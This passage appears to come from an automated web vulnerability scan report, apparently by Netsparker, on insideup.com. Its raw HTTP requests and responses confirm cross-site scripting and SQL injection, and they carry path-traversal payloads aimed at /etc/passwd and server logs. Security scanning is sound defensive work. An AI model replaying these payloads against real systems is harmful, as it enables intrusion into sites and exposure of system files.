OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:47 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mg0qggj87ulapruv307rvtm8u7; path=/
Content-Length: 2893
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>' OR prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>' OR prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>' OR prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>' OR prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>' OR prj.project_page_url = 'leadflow/?'"--></style></script><script>netsparker(0x000559)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000559)</script>/' union select prj.catI' at line 5
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST '"--></style></script><script>alert(0x00055B)</script>
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 327
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1=3&password2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00055B)%3c%2fscript%3e&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:46 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=F99D90FD69BB4B3C4B6566AE86F091CF; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /ppc/leadflow/phsy00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055F)%3C/script%3E

/ppc/leadflow/phsy00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055F)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00055F)</script>

Request

GET /ppc/leadflow/phsy00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00055F)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
